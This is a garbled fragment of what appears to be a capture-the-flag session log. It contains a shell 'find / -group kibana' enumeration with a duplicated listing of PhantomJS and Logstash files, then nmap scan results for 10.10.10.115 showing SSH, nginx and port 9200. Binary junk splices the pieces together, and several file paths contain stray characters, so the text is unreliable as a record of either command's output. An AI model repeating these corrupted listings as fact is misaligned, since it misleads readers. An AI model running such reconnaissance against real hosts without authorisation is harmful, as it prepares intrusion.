/var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/loadspeed.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/injectme.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/render_multi_url.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/server.js l /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/netlog.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/pagecallback.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/module.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/arguments.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/universe.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/openurlwithproxy.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/sleepsort.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/modernizr.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/unrandomize.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/hello.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/stdin-stdout-stderr.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/fibo.js /varm/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/phantomwebintro.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/echoToFile.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/post.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/loadurlwithoutcss.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/printenv.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/useragent.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/rasterize.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/outputEncoding.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/waitfor.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/serverkeepalive.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/postserver.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/printmargins.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/version.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/run-qunit.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/features.js n/var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/netsniff.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/walk_through_frames.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/printheaderfooter.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/responsive-screenshot.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/countdown.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/detectsniff.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/simpleserver.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/postjson.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/run-jasmine2.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/run-jasmine.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/README.md /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/LICENSE.BSD /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/bin /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/third-party.txt /var/lib/kibana/phantomjs-2.1.1o-linux-x86_64/ChangeLog /var/log/kibana /opt/kibana bash-4.2$ find / -group kibana 2>/dev/null | grep -v usr | grep -v proc find / -group kibana 2>/dev/null | grep -v usr | grep -v proc /etc/logstash/conf.d /etc/logstash/conf.d/output.conf /etc/logstash/conf.d/input.conf /etc/logstash/conf.d/filter.conf /etc/logstash/log4j2.properties /etc/logstash/logstash-sample.conf /etc/logstash/pipelines.yml /etc/logstash/jvm.options /etc/logstash/logstash.yml /etc/logstash/startup.options /etc/logstash/logstash.yml.rpmnew /var/lib/kibana /var/lib/kibana/uuid /var/lib/kibana/phantomjs-2.1.1-linux-x86_64 /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/colorwheel.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/scandir.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/page_events.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/loadspeed.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/injectme.js /var/lib/kibana/phantomjs-p2.1.1-linux-x86_64/examples/render_multi_url.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/server.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/netlog.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/pagecallback.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/module.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/arguments.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/universe.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/openurlwithproxy.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/sleepsort.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/modernizr.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/unrandomize.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/hello.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/stdin-stdout-stderr.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/fibo.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/phantomwebintro.js /var/lib/kibana/phantomjsq-2.1.1-linux-x86_64/examples/echoToFile.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/post.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/loadurlwithoutcss.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/printenv.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/useragent.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/rasterize.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/outputEncoding.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/waitfor.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/serverkeepalive.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/postserver.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/printmargins.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/version.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/run-qunit.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/features.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/netsniff.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/walk_through_frames.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/printheaderfooter.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/responsive-screenshot.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/countdown.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/detectsniff.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/simpleserver.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/postjson.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/run-jasmine2.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/run-jasmine.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/README.md /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/LICENSE.BSD /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/bin /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/bin/phantomjs /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/third-party.txt /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/ChangeLog /var/log/kibana /opt/kibana custom-colors$Aסʱ#port for 10.10.10.115 Host is up (0.59s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA) | 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA) |_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519) 80/tcp open http nginx 1.12.2 |_http-server-header: nginx/1.12.2 |_http-title: Site doesn't have a title (text/html). 9200/tcp open http nginx 1.12.2 | http-methods: |_ Potentially risky methods: DELETE |_http-server-header: nginx/1.12.2 |_http-title: Site doesn't have a title (application/json; charset=UTF-8). Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 129.87 secondscustom-colors$A?&Aסk7